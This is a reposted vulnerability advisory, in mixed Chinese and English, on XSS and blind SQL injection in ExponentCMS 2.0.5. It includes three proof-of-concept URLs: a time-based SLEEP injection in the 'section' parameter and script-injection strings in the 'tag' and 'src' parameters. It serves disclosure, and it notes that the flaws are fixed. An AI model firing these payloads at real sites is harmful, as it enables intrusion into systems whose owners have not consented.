来源:自学PHP网 时间:2015-04-17 13:02 作者: 阅读:次
[导读] 信息--------------------名称 : XSS and Blind SQL Injection Vulnerabilities in ExponentCMS影像软件 : ExponentCMS 2.0.5 and possibly below.开发网站: http://www.exponentcms.org缺陷类型......
信息
-------------------- 名称 : XSS and Blind SQL Injection Vulnerabilities in ExponentCMS 影像软件 : ExponentCMS 2.0.5 and possibly below. 开发网站: http://www.exponentcms.org 缺陷类型 : Cross-Site Scripting and SQL Injection 安全级别 : Critical Researcher : Onur Yılmaz 描述 -------------------- Exponent is a website content management system (or CMS) that allows site owners to easily create and manage dynamic websites without necessarily directly coding web pages, or managing site navigation. 日记 -------------------- Exponent CMS 2.0.5版有xss缺陷 Example PoC urls are as follows : http://www.2cto.com /index.php?section=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A) http://example.com/index.php?action=showall_by_tags&tag=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E&controller=news&src= () random4e5433b85bb1f http://example.com/index.php?controller=expTag&action=show&title=changes&src=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E You can read the full article about Cross-Site Scripting and SQL Injection vulnerabilities from here : http://www.mavitunasecurity.com/crosssite-scripting-xss/ http://www.mavitunasecurity.com/sql-injection/ 解决方案 -------------------- 开发者已经在新版里修复了这些问题 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com